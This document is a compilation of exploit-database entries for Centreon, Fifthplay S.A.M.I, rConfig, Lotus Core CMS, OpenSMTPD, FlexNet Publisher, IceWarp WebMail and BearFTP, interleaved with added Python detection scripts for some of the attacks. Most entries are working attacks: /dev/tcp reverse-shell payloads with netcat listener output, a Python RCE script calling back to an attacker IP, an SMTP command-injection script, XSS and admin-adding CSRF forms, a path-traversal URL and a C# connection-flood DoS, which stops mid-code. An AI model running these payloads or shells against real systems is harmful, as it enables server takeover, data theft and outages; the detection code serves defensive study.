
# Exploit Title: Centreon 19.10.5 - 'centreontrapd' Remote Command Execution 
# Date: 2020-01-29
# Exploit Author: Fabien AUNAY, Omri Baso
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7
# CVE : -

###########################################################################################################
Centreon 19.10.5 Remote Command Execution centreontrapd

Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Health care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.

It is possible to get a reverse shell with an SNMP trap and gain a pivot inside a distributed architecture.


Steps:
Objective 1 : Create an SNMP trap or use linkDown OID with special command in action 3
Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
Objective 3 : Assign service trap relation
Objective 4 : Get centreon id reverse shell

###########################################################################################################

# Objective 1 : Create or use SNMP trap OID with special command in action 3
- Configuration  >  SNMP Traps

[+] Trap name *     : linkDown
[+] OID *        : .1.3.6.1.6.3.1.1.5.3
[+] Special Command    : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121


# Objective 2 : Create passive service and use App-Monitoring-Centreon-Service-Dummy
- Configuration  >  Services  >  Services by host

[+] Description *        : TRAP RCE
[+] Linked with Hosts *        : YOUR-LINKED-HOST
[+] Check Command *        : App-Monitoring-Centreon-Service-Dummy
[+] DUMMYSTATUS            : 0
[+] DUMMYOUTPUT            : 0
[+] Passive Checks Enabled     : YES
[+] Is Volatile            : YES
[+] Service Trap Relation    : Generic - linkDown


# Objective 3 : Assign service trap relation
- Configuration  >  SNMP Traps
- linkDown
- Relations

[+] Linked services        : YOUR-LINKED-HOST - SERVICE DESCRIPTION

reload Central
Reload snmp config


# Objective 4 : Get centreon id reverse shell and think lateral

[+] Send your trap
snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2

TIP: centreontrapd logfile:
2020-01-29 02:52:33 - DEBUG - 340 - Reading trap.  Current time: Wed Jan 29 02:52:33 2020
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (DISMAN-EVENT-MIB::sysUpTimeInstance).  Will attempt to translate to a numerical OID
2020-01-29 02:52:33 - DEBUG - 340 -   Translated to .1.3.6.1.2.1.1.3.0
2020-01-29 02:52:33 - DEBUG - 340 - Symbolic trap variable name detected (SNMPv2-MIB::snmpTrapOID.0).  Will attempt to translate to a numerical OID
...
2020-01-29 02:52:33 - DEBUG - 340 - Trap found on service 'TRAP RCE' for host 'supervision_IT'.
...
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
..
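
A detection sketch for the log excerpt above, added here as an example (it is not part of the original advisory or of Centreon). It parses centreontrapd lines and flags any "EXEC: Launched command" entry whose command uses socket pseudo-devices, descriptor redirection or command chaining. The rule set and the final benign sample lines are assumptions; the other sample lines come from the excerpt.

```python
import re

# Line layout as in the centreontrapd excerpt above:
#   "<date> <time> - <LEVEL> - <pid> - <message>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) - (?P<level>[A-Z]+) - "
    r"(?P<pid>\d+) - (?P<msg>.*)$"
)
TRAP_RE = re.compile(
    r"Trap found on service '(?P<service>[^']*)' for host '(?P<host>[^']*)'"
)
EXEC_PREFIX = "EXEC: Launched command: "

# Assumed rule set: shell constructs a trap "special command" should never need.
RULES = [
    ("dev-tcp-socket", re.compile(r"/dev/(?:tcp|udp)/")),
    ("fd-redirect-exec", re.compile(r"\bexec\s+\d+<>")),
    ("shell-on-fd", re.compile(r"(?:^|[;&|\s])(?:ba|da|z|k)?sh\s+[<>]&\d+")),
    ("command-chaining", re.compile(r"[;`]|\$\(|\|\||&&")),
]

# Lines from the excerpt above, followed by two constructed benign lines.
SAMPLE_LOG = """\
2020-01-29 02:52:33 - DEBUG - 340 - Reading trap.  Current time: Wed Jan 29 02:52:33 2020
...
2020-01-29 02:52:33 - DEBUG - 340 - Trap found on service 'TRAP RCE' for host 'supervision_IT'.
...
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launch specific command
2020-01-29 02:52:43 - INFO - 1757 - EXEC: Launched command: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/12345;sh <&121 >&121 2>&121
2020-01-29 03:10:02 - DEBUG - 340 - Trap found on service 'Link state' for host 'edge-sw-01'.
2020-01-29 03:10:02 - INFO - 1802 - EXEC: Launched command: /usr/local/bin/ticket-hook --trap linkDown
"""


def scan(lines):
    """Return one finding per launched command that matches at least one rule."""
    findings = []
    # The EXEC line is written by a different pid than the "Trap found" line,
    # so the host/service context is simply the most recent one seen.
    last_trap = (None, None)
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # elided ("...") or unparsable line
        msg = m.group("msg")
        trap = TRAP_RE.search(msg)
        if trap:
            last_trap = (trap.group("host"), trap.group("service"))
            continue
        if not msg.startswith(EXEC_PREFIX):
            continue
        command = msg[len(EXEC_PREFIX):]
        hits = [name for name, rx in RULES if rx.search(command)]
        if hits:
            findings.append({
                "ts": m.group("ts"),
                "pid": m.group("pid"),
                "host": last_trap[0],
                "service": last_trap[1],
                "command": command,
                "rules": hits,
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f["ts"], f["host"], f["service"], ",".join(f["rules"]))
        print("   ", f["command"])
```

The "Trap found" lines are logged at DEBUG level in the excerpt, so with debug logging off the host and service fields stay empty while the EXEC line itself is still caught.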


NOTE: Read the doc !!!
https://documentation-fr.centreon.com/docs/centreon/fr/latest/administration_guide/poller/ssh_key.html?highlight=keygen

The centreon id user shares configurations and instructions with satellite collectors through SSH.
No passphrase used.
This allows you to move around the infrastructure after your RCE.


POC:

snmptrap -v2c -c public 127.0.0.1 '' .1.3.6.1.6.3.1.1.5.3 ifIndex i 1 ifadminStatus i 2 ifOperStatus i 2

nc -lvnp 12345
Ncat: Version 7.50
Ncat: Listening on :::12345
Ncat: Listening on 0.0.0.0:12345
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:38470.
id
uid=997(centreon) gid=994(centreon) groups=994(centreon),48(apache),990(centreon-engine),992(centreon-broker)
sudo -l
Matching Defaults entries for centreon on centreonlab:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty

User centreon may run the following commands on centreonlab:
    (root) NOPASSWD: /sbin/service centreontrapd start
    (root) NOPASSWD: /sbin/service centreontrapd stop
    (root) NOPASSWD: /sbin/service centreontrapd restart
    (root) NOPASSWD: /sbin/service centreontrapd reload
    (root) NOPASSWD: /usr/sbin/service centreontrapd start
    (root) NOPASSWD: /usr/sbin/service centreontrapd stop
    (root) NOPASSWD: /usr/sbin/service centreontrapd restart
    (root) NOPASSWD: /usr/sbin/service centreontrapd reload
    (root) NOPASSWD: /sbin/service centengine start
    (root) NOPASSWD: /sbin/service centengine stop
    (root) NOPASSWD: /sbin/service centengine restart
    (root) NOPASSWD: /sbin/service centengine reload
    (root) NOPASSWD: /usr/sbin/service centengine start
    (root) NOPASSWD: /usr/sbin/service centengine stop
    (root) NOPASSWD: /usr/sbin/service centengine restart
    (root) NOPASSWD: /usr/sbin/service centengine reload
    (root) NOPASSWD: /bin/systemctl start centengine
    (root) NOPASSWD: /bin/systemctl stop centengine
    (root) NOPASSWD: /bin/systemctl restart centengine
    (root) NOPASSWD: /bin/systemctl reload centengine
    (root) NOPASSWD: /usr/bin/systemctl start centengine
    (root) NOPASSWD: /usr/bin/systemctl stop centengine
    (root) NOPASSWD: /usr/bin/systemctl restart centengine
    (root) NOPASSWD: /usr/bin/systemctl reload centengine
    (root) NOPASSWD: /sbin/service cbd start
    (root) NOPASSWD: /sbin/service cbd stop
    (root) NOPASSWD: /sbin/service cbd restart
    (root) NOPASSWD: /sbin/service cbd reload
    (root) NOPASSWD: /usr/sbin/service cbd start
    (root) NOPASSWD: /usr/sbin/service cbd stop
    (root) NOPASSWD: /usr/sbin/service cbd restart
    (root) NOPASSWD: /usr/sbin/service cbd reload
    (root) NOPASSWD: /bin/systemctl start cbd
    (root) NOPASSWD: /bin/systemctl stop cbd
    (root) NOPASSWD: /bin/systemctl restart cbd
    (root) NOPASSWD: /bin/systemctl reload cbd
    (root) NOPASSWD: /usr/bin/systemctl start cbd
    (root) NOPASSWD: /usr/bin/systemctl stop cbd
    (root) NOPASSWD: /usr/bin/systemctl restart cbd
    (root) NOPASSWD: /usr/bin/systemctl reload cbd
            
# Exploit Title: Centreon 19.10.5 - 'Pollers' Remote Command Execution
# Date: 2020-01-27
# Exploit Author: Omri Baso, Fabien Aunay
# Vendor Homepage: https://www.centreon.com/
# Software Link: https://github.com/centreon/centreon
# Version: 19.10.5
# Tested on: CentOS 7.7
# CVE : -


Centreon 19.10.5 Remote Command Execution Misc

Trusted by SMBs and Fortune 500 companies worldwide.
An industry reference in IT Infrastructure monitoring for the enterprise.
Counts 200,000+ ITOM users worldwide and an international community of software collaborators.
Presence in Toronto and Luxembourg.
Deployed in diverse sectors:
- IT & telecommunication
- Transportation
- Government
- Health care
- Retail
- Utilities
- Finance & Insurance
- Aerospace & Defense
- Manufacturing
- etc.


User input is not sanitized for safe use, so it is possible to gain remote code execution on the server
hosting the Centreon service, leading to a full server takeover as the user "apache".

Steps:
1.) <BASEURL>/centreon/main.php?p=60803&type=3
     Here we create the Command - can also be found under
     Configuration  >  Commands  >  Miscellaneous
     we Press "Add" -
     Command Name: "misc"
     Payload: 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121

2.) go to: <BASEURL>/centreon/main.php?p=60901
     Configuration  >  Pollers
     Open "Central" Poller
     add on "Post-Restart command"
     the command "misc" we created
     make Status "Enabled"

3.) Check the box "Post generation command" in the "Export Configuration" Tab
    3.1) Restart Poller and get Shell.




    ┌─[root@vps]─[~]
└──╼ #nc -lnvp 1234
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:49184.
whoami
apache
id
uid=48(apache) gid=48(apache) groups=48(apache),990(centreon-engine),992(centreon-broker),993(nagios),994(centreon)
___________________________________________________________________
            
# Exploit Title: Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting
# Date: 2020-01-29
# Exploit Author: LiquidWorm
# Vendor: Fifthplay NV
# Vendor Homepage: https://www.fifthplay.com
# Version: 2019.2_HP
# Tested on: Linux
# CVE : -

Fifthplay S.A.M.I - Service And Management Interface Unauthenticated Stored XSS


Vendor: Fifthplay NV
Product web page: https://www.fifthplay.com
Affected version: Platform: HAM V1.2
                            HAM V1.1
                            HAM V1.0
                            DINHAM 10W
                  Image Version: 2019.3-20190605144803
                                 2019.2_HP-20190808154634
                                 2018.4_HP-20181015152950
                                 2018.2-20180516100815
                                 2017.2_HP-20180213083050
                                 2013.4_HP-201309301203
                  AMP Version: 2019.2_HP
                               2018.4_HP
                               2017.2_HP
                               2013.4_HP
                               R20.19.03
                               R20.18.02
                  Fix: 2017.2-HP4
                       2018.4_HP3
                       2018.5_HP7
                       2019.2_HP3
                       2019.3_HP1

Summary: Fifthplay is a Belgian high-tech player and a subsidiary of Niko Group. 
We specialise in enriching smart homes and buildings for almost 10 years, and in
services that provide comfort and energy. Our gateway provides a modular approach
to integrating old and new technologies, such as smart meters, optical meters,
sockets, switches. Fifthplay is a trendsetter with regards to smart homes and buildings
and one of the sector's most innovative companies.

Desc: The application suffers from an unauthenticated stored XSS through POST request.
The issue is triggered when input passed via several parameters is not properly
sanitized before being returned to the user. This can be exploited to execute arbitrary
HTML and script code in a user's browser session in context of an affected site. The
application interface also allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited
to perform certain actions if a user visits a malicious web site.

Tested on: lighttpd/1.4.33
           PHP/5.4.33
           PHP/5.3.19


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2020-5561
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5561.php


29.09.2019

--


Stored XSS:
-----------

<html>
  <body>
    <form action="http://192.168.11.1/?page=networksettings" method="POST">
      <input type="hidden" name="server" value='"><script>prompt(251)</script>' />
      <input type="hidden" name="port" value='"><script>prompt(252)</script>' />
      <input type="hidden" name="auth" value="1" />
      <input type="hidden" name="user" value='"><script>prompt(253)</script>' />
      <input type="hidden" name="pass" value='"><script>prompt(254)</script>' />
      <input type="hidden" name="submit" value="Change" />
      <input type="submit" value="Write" />
    </form>
  </body>
</html>


Set proxy CSRF:
---------------
<html>
  <body>
    <form action="http://192.168.11.1/?page=networksettings" method="POST">
      <input type="hidden" name="server" value="proxy.segfault.mk" />
      <input type="hidden" name="port" value="8080" />
      <input type="hidden" name="auth" value="1" />
      <input type="hidden" name="user" value="testuser" />
      <input type="hidden" name="pass" value="testpass" />
      <input type="hidden" name="submit" value="Change" />
      <input type="submit" value="Write" />
    </form>
  </body>
</html>


Delete proxy CSRF:
------------------

<html>
  <body>
    <form action="http://192.168.11.1/?page=networksettings" method="POST">
      <input type="hidden" name="server" value="proxy.segfault.mk" />
      <input type="hidden" name="port" value="8080" />
      <input type="hidden" name="auth" value="1" />
      <input type="hidden" name="user" value="testuser" />
      <input type="hidden" name="pass" value="testpass" />
      <input type="hidden" name="delete" value="Delete" />
      <input type="submit" value="Clear" />
    </form>
  </body>
</html>
            
# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution
# Date: 2019-11-07
# CVE-2019-19509
# Exploit Author: vikingfr
# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh
# Version: tested v3.9.3
# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
#
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
#
# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081
# rconfig - CVE-2019-19509 - Web authenticated RCE
# [+] Logged in successfully, triggering the payload...
# [+] Check your listener !
# ...
# $ nc -nvlp 8081
# listening on [any] 8081 ...
# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458
# bash: no job control in this shell
# bash-4.2$ id
# id
# uid=48(apache) gid=48(apache) groups=48(apache)
# bash-4.2$ 

#!/usr/bin/python3

import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print ("rconfig - CVE-2019-19509 - Web authenticated RCE")

if len(sys.argv) != 6:
    print ("[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort")
    exit()

target = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
payload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)

request = requests.session()

login_info = {
    "user": username,
    "pass": password,
    "sublogin": 1
}

login_request = request.post(
    target+"/lib/crud/userprocess.php",
     login_info,
     verify=False,
     allow_redirects=True
 )

dashboard_request = request.get(target+"/dashboard.php", allow_redirects=False)

if dashboard_request.status_code == 200:
    print ("[+] Logged in successfully, triggering the payload...")
    encoded_request = target+"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random".format(urllib.parse.quote(payload))
    print ("[+] Check your listener !")
    exploit_req = request.get(encoded_request)

elif dashboard_request.status_code == 302:
    print ("[-] Wrong credentials !")
    exit()
            
# Exploit Title: Lotus Core CMS 1.0.1 - Local File Inclusion
# Google Dork: N/A
# Date: 2020-01-31
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: http://lotuscore.sourceforge.net/
# Software Link: https://sourceforge.net/projects/lotuscore/files/latest/download
# Version: 1.0.1
# Tested on: Windows 7 x86
# CVE : N/A


The vulnerability occurs on line 65 of the index.php file. The script reads the page_slug parameter:
if the user does not set it, it defaults to index, but if the user sets it via a GET or POST request,
the script checks whether the file exists and, if it does, performs an unsanitized inclusion.

-----------------------------------------------------------------------------

if(!$_REQUEST['page_slug']){
	$_REQUEST['page_slug'] = 'index';
}
if(file_exists('system/plugins/'.$_REQUEST['page_slug'].'.php') == true){
	include('system/plugins/'.$_REQUEST['page_slug'].'.php');
}else{
	include("system/plugins/error/404.php");
}

------------------------------------------------------------------------------


The PHP file appends .php to anything we provide as the page_slug parameter, so to include any file we must use a null byte.
Note that you need to be authenticated to exploit this. The exploitation would look like this:

http://site:80/index.php?page_slug=../../../../../etc/passwd%00
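
Both the rConfig request further up (the "path" parameter of ajaxArchiveFiles.php) and the Lotus Core request above (the "page_slug" parameter of index.php) carry their payload in a query string, so one access-log screen can cover both. The following is an added example, not code from either advisory or project; the combined log format, the rule table and all sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Prefix of a common/combined access-log line (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SHELL_META = re.compile(r"[`;|&<>]|\$\(|\$\{")
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# Plugin names as the PHP snippet uses them: "index", "error/404", ...
SLUG_OK = re.compile(r"^[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)*$")

# (endpoint suffix, parameter) -> checks applied to the decoded value.
RULES = {
    ("/lib/ajaxHandlers/ajaxArchiveFiles.php", "path"): [
        ("shell-metachar", lambda v: bool(SHELL_META.search(v))),
    ],
    ("/index.php", "page_slug"): [
        ("null-byte", lambda v: "\x00" in v),
        ("path-traversal", lambda v: bool(TRAVERSAL.search(v))),
        ("not-a-slug", lambda v: v != "" and not SLUG_OK.match(v)),
    ],
}

# Constructed sample lines (documentation IP ranges, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2019:10:00:01 +0000] "GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=%2Ftmp%2Farchive&ext=txt HTTP/1.1" 200 512',
    '192.0.2.66 - - [07/Nov/2019:10:00:05 +0000] "GET /lib/ajaxHandlers/ajaxArchiveFiles.php?path=%60id%60&ext=random HTTP/1.1" 200 0',
    '198.51.100.7 - - [31/Jan/2020:09:12:40 +0000] "GET /index.php?page_slug=error/404 HTTP/1.1" 200 1024',
    '198.51.100.9 - - [31/Jan/2020:09:13:02 +0000] "GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1" 200 2048',
]


def screen_target(target):
    """Return [(param, [rule, ...])] for one request target (path?query)."""
    parts = urlsplit(target)
    hits = []
    for (suffix, param), checks in RULES.items():
        if not parts.path.endswith(suffix):
            continue
        # parse_qsl percent-decodes once, as the web server does.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name != param:
                continue
            rules = [rule for rule, test in checks if test(value)]
            if rules:
                hits.append((param, rules))
    return hits


def screen_log(lines):
    """Return one finding per flagged parameter in the given log lines."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, rules in screen_target(m.group("target")):
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "path": urlsplit(m.group("target")).path,
                "param": param,
                "rules": rules,
            })
    return findings


if __name__ == "__main__":
    for f in screen_log(SAMPLE_LOG):
        print(f["ip"], f["path"], f["param"], ",".join(f["rules"]))
```

Because index.php reads page_slug from $_REQUEST, the same value sent in a POST body never reaches the access log; the slug allow-list belongs in the application or a request filter as well.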
            
# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution
# Date: 2020-01-29
# Exploit Author: 1F98D
# Original Author: Qualys Security Advisory
# Vendor Homepage: https://www.opensmtpd.org/
# Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1
# Version: OpenSMTPD < 6.6.2
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2020-7247
# References:
# https://www.openwall.com/lists/oss-security/2020/01/28/3
#
# OpenSMTPD after commit a8e222352f and before version 6.6.2 does not adequately
# escape dangerous characters from user-controlled input. An attacker
# can exploit this to execute arbitrary shell commands on the target.
# 
#!/usr/local/bin/python3

from socket import *
import sys

if len(sys.argv) != 4:
    print('Usage {} <target ip> <target port> <command>'.format(sys.argv[0]))
    print("E.g. {} 127.0.0.1 25 'touch /tmp/x'".format(sys.argv[0]))
    sys.exit(1)

ADDR = sys.argv[1]
PORT = int(sys.argv[2])
CMD = sys.argv[3]

s = socket(AF_INET, SOCK_STREAM)
s.connect((ADDR, PORT))

res = s.recv(1024)
if 'OpenSMTPD' not in str(res):
    print('[!] No OpenSMTPD detected')
    print('[!] Received {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] OpenSMTPD detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error connecting, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Connected, sending payload')
s.send(bytes('MAIL FROM:<;{};>\r\n'.format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
    print('[!] Error sending payload, expected 250')
    print('[!] Received: {}'.format(str(res)))
    print('[!] Exiting...')
    sys.exit(1)

print('[*] Payload sent')
s.send(b'RCPT TO:<root>\r\n')
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')
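
The script above places its command in the MAIL FROM reverse-path. As an added example (not code from the advisory or from OpenSMTPD), the screen below could run in a filter or proxy in front of an unpatched server, or over captured SMTP sessions: it rejects any reverse-path with no domain, a local part outside a narrow allow-list, or shell metacharacters. The allow-list, the reason codes and the sample session are assumptions.

```python
import re

MAIL_FROM_RE = re.compile(r"^MAIL FROM:\s*<(?P<path>[^>]*)>", re.IGNORECASE)

# Deliberately narrower than RFC 5321 atext: several atext characters
# (` $ | & and others) are also shell metacharacters.
SAFE_LOCAL_RE = re.compile(r"^[A-Za-z0-9_+=-]+(?:\.[A-Za-z0-9_+=-]+)*$")
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)
SHELL_META = set(";|&`$(){}<>\\'\"*?!~# \t\n")

# Constructed SMTP client lines; line 5 uses the command from the script's usage text.
SAMPLE_SESSION = [
    "HELO x",
    "MAIL FROM:<alice@example.org> SIZE=2048",
    "RCPT TO:<root>",
    "RSET",
    "MAIL FROM:<;touch /tmp/x;>",
    "RCPT TO:<root>",
    "MAIL FROM:<>",
    "MAIL FROM:<bob`id`@example.org>",
]


def check_reverse_path(path):
    """Return reason codes for rejecting `path`; an empty list means accept."""
    if path == "":
        return []  # null reverse-path "<>", used for bounces
    reasons = []
    local, sep, domain = path.rpartition("@")
    if not sep:
        # No "@" at all: the whole string is the local part.
        local, domain = path, ""
        reasons.append("no-domain")
    elif not DOMAIN_RE.match(domain):
        reasons.append("bad-domain")
    if not SAFE_LOCAL_RE.match(local):
        reasons.append("bad-local-part")
    if set(path) & SHELL_META:
        reasons.append("shell-metachar")
    return reasons


def screen_session(lines):
    """Return [(line_number, [reason, ...])] for rejected MAIL FROM commands."""
    flagged = []
    for number, line in enumerate(lines, 1):
        m = MAIL_FROM_RE.match(line.strip())
        if not m:
            continue
        reasons = check_reverse_path(m.group("path"))
        if reasons:
            flagged.append((number, reasons))
    return flagged


if __name__ == "__main__":
    for number, reasons in screen_session(SAMPLE_SESSION):
        print(number, SAMPLE_SESSION[number - 1], "->", ",".join(reasons))
```

The allow-list is stricter than the RFC on purpose and will refuse quoted local parts; the fix named in the header above remains upgrading to 6.6.2 or later.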
            
# Exploit Title: FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)
# Date: 2019-12-29 
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.flexerasoftware.com/
# Software : FlexNet Publisher
# Product Version:  v11.12.1
# Product : https://www.flexerasoftware.com/monetize/products/flexnet-licensing.html
# Product Version : https://helpnet.flexerasoftware.com/eol/flexnet-publisher.htm 
# Vulnerability Type : Cross-Site Request Forgery (Add Local Admin)
# Vulnerability : Cross-Site Request Forgery
# Reference : https://community.flexera.com/t5/FlexNet-Publisher-Knowledge-Base/CVE-2019-8962-remediated-in-FlexNet-Publisher/ta-p/131062
# CVE : N/A

HTTP Request :

POST /users HTTP/1.1
Host: SERVER:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://SERVER:8888/users?event=create&licenseTab=
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Connection: close
Cookie: Webstation-Locale=en-US; sess_lmgrd=32CFC53815147D5362ACAAF100000001; GUEST=1; UID=GUEST; FL=1; FA=1; DM=; user_type_lmgrd=0
Upgrade-Insecure-Requests: 1

licenseTab=&selected=&userType=local-admin&userName=ISMAILTASDELEN&firstName=Ismail&lastName=Tasdelen&password2=Test12345&confirm=Test12345&accountType=admin&checksum=1d00c20815e84c31&Create=Create

HTTP Response :

HTTP/1.1 200 OK
Date: Sun, 29 Dec 2019 08:38:14 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14434

CSRF HTML PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://SERVER:8888/users" method="POST">
      <input type="hidden" name="licenseTab" value="" />
      <input type="hidden" name="selected" value="" />
      <input type="hidden" name="userType" value="local&#45;admin" />
      <input type="hidden" name="userName" value="ISMAILTASDELEN" />
      <input type="hidden" name="firstName" value="Ismail" />
      <input type="hidden" name="lastName" value="Tasdelen" />
      <input type="hidden" name="password2" value="Test12345" />
      <input type="hidden" name="confirm" value="Test12345" />
      <input type="hidden" name="accountType" value="admin" />
      <input type="hidden" name="checksum" value="1d00c20815e84c31" />
      <input type="hidden" name="Create" value="Create" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
# Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting
# Date: 2020-01-27
# Author: Lutfu Mert Ceylan
# Vendor Homepage: www.icewarp.com
# Tested on: Windows 10
# Versions: 11.4.4.1 and before
# Vulnerable Parameter: "color" (Get Method)
# Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server
# CVE: CVE-2020-8512

# Notes:

# An attacker can use XSS (in the "color" parameter of IceWarp WebMail 11.4.4.1 and
# before) to send a malicious script to unsuspecting admins or users. The
# admin's or user's browser has no way to know that the script should not
# be trusted, and will execute the script. Because it thinks the script came
# from a trusted source, the malicious script can access any cookies, session
# tokens, or other sensitive information retained by the browser and used
# with that site. These scripts can even rewrite the content of the HTML
# page. An attacker can also easily use this vulnerability for social
# engineering, for example by creating a fake field.

# PoC:

# Go to Sign-in page through this path: http://localhost/webmail/ or http://localhost:32000/webmail/

# Add the "color" parameter to the URL and write malicious code, Example: http://localhost/webmail/?color="><svg/onload=alert(1)>

# When the user goes to the URL, the malicious code is executed

Example Vulnerable URL: http://localhost/webmail/?color="><svg/onload=alert(1)>
            
# Exploit Title: BearFTP 0.1.0 - 'PASV' Denial of Service
# Date: 2020-01-29
# Exploit Author: kolya5544
# Vendor Homepage: http://iktm.me/
# Software Link: https://github.com/kolya5544/BearFTP/releases
# Version: v0.0.1 - v0.1.0
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-8416

static void Main(string[] args)
        {
            Console.WriteLine("DoS started. Approx. time to complete: 204 seconds.");
            for (int i = 0; i < 1024*8; i++) // We will do 8000+ connections. Usually server only spawns half of them.
            {
                new Thread(() =>
                {
                    Thread.CurrentThread.IsBackground = true;

                    TcpClient exploit = new TcpClient("HOSTNAME", PASV_PORT); //Replace with actual data to test it.
                    var ns = exploit.GetStream();
                    StreamWriter sw = new StreamWriter(ns);
                    sw.AutoFlush = true;
                    StreamReader sr = new StreamReader(ns);


                    while (true)
                    {
                        Thread.Sleep(5000); //We just spend our time.
                    }
                }).Start();
                Thread.Sleep(25); //Spawn a new connection every 25ms so we don't kill our own connection.
            }
            while (true)
